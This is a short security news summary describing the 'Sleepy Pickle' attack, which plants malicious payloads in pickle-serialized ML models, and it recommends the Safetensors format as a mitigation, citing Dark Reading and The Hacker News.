A new attack technique [2], known as the “Sleepy Pickle” attack [1], has recently been discovered, posing a significant threat to machine learning models.
Description
The “Sleepy Pickle” attack targets machine learning models by exploiting the Pickle serialization format [2]. This attack allows for the insertion of malicious payloads into pickle files [2], corrupting ML models and manipulating their behavior [2]. By loading a poisoned pkl file during deserialization [2], attackers can potentially insert backdoors, control outputs [2], tamper with data [2], and generate harmful outputs or misinformation [2]. This attack poses a significant risk to organizations that rely on ML models, as it can maintain surreptitious access and evade detection [2]. To mitigate this threat [1], organizations can consider using safer file formats like Safetensors [1], which only deal with tensor data and eliminate the risk of arbitrary code execution during deserialization [1].
Conclusion
The “Sleepy Pickle” attack highlights the importance of securing machine learning models against malicious exploitation. Organizations must take proactive measures to protect their ML models from such attacks by adopting safer file formats and implementing robust security measures. As the use of machine learning continues to grow, it is crucial to stay vigilant and adapt to emerging threats in order to safeguard sensitive data and maintain the integrity of ML systems.
References
[1] https://www.darkreading.com/threat-intelligence/sleepy-pickle-exploit-subtly-poisons-ml-models
[2] https://vulners.com/thn/THN:78F0F730E5A25BE30885D013C8900B05